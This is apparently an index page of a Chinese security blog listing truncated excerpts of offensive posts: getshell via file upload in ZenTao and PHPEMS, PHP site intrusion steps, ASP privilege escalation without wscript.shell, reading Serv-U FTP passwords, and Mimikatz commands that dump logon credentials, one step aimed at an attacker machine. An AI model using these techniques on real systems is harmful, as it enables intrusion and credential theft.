热门 禅道低权限账户getshell

时间:2016-11-27   作者:webbaozi   分类: 代码审计   热度:3917°    
时间:2016-11-27   分类: 代码审计    热度:3917  
复制之前提交的吧,这次就不用重新复现了。浪费时间,之前提交在某平台,直接copy过来了0.0 新测试: 时间:2017-2-7 版本9.0开源,以下方法也能getshell 在产品-》产品描述中,选择上传图片。(只要能上传图片的账户就能getshell) 这是之前黑盒测试留下的(当初下载最新版也能getshell,今天下载不能复现了,原因在函数function checkFileName中对于文件名的检测加上了:) 跟进代码: module\file\control.php ajaxUpload()函数 public function...

阅读全文>>

热门 phpems最新版V3.1前台getshell

时间:2016-11-23   作者:webbaozi   分类: 代码审计   热度:1693°    
时间:2016-11-23   分类: 代码审计    热度:1693  
下载地址: http://www.mycodes.net/53/5773.htm 在测试过程中,发现可以截断上传,如下步骤。 首先注册一个账号,然后选择上传图片 跟进-文件document->api.php文件swfupload函数 $fileurl = $this->files->uploadFile($upfile,$path,NULL,NULL,$this->allowexts); 继续跟进uploadfile函数 文件lib/files/files.c...

阅读全文>>

热门 php网站web数据分离入侵姿势

时间:2016-11-20   作者:webbaozi   分类: web安全   热度:3050°    
时间:2016-11-20   分类: web安全    热度:3050  
情况一:php网站大多数配置mysql的数据库,如果web和数据库不分离root权限的话,一般也是读文件,爆路径,扫文件,读配置,最终目的是写shell或者能更直观的连接数据库!! 附: php爆路径的方法或者扫phpinfo():也跟下面差不多 如果扫到有phpmyadmin,直接登录就好, 如果要拿shell的话,实在拿不到shell就退而求其次,当没有phpmyadmin一类的时候 phpmyadmin 暴绝对路径:  1. 用Web路径自动盲爆工具 V2.0 乌云内测(带字典).rar 2.扫phpinfo.php  info....

阅读全文>>

热门 无wscript.shell组件提权

时间:2016-11-20   作者:webbaozi   分类: web安全   热度:2125°    
时间:2016-11-20   分类: web安全    热度:2125  
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。 要想让运行命令可以试试这种方法,成功率为五五之数。 把下面代码复制: <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runa...

阅读全文>>

热门 利用Serv-U获取ftp账号密码

时间:2016-11-13   作者:webbaozi   分类: 小技巧   热度:2247°    
时间:2016-11-13   分类: 小技巧    热度:2247  
1.可以读取文件 2.安装了Serv-U 在其Serv-U安装目录会有文件ServUDaemon.ini 拿其中一个举例: 格式为: [USER=baozi|1] 表示用户为baozi password=mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37表示ftp用户baozi的密码为“mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37”。   HomeDir=d:\wwwroot\zt828表示默认主目录为“d:\wwwroot\baozi...

阅读全文>>

热门 Mimikatz 使用Tips

时间:2016-11-11   作者:webbaozi   分类: 小技巧   热度:2023°    
时间:2016-11-11   分类: 小技巧    热度:2023  
 ps:以管理员身份运行 1.记录 Mimikatz输出:  C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件:  C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输到远程机器:  Attacker执行:&nbs...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1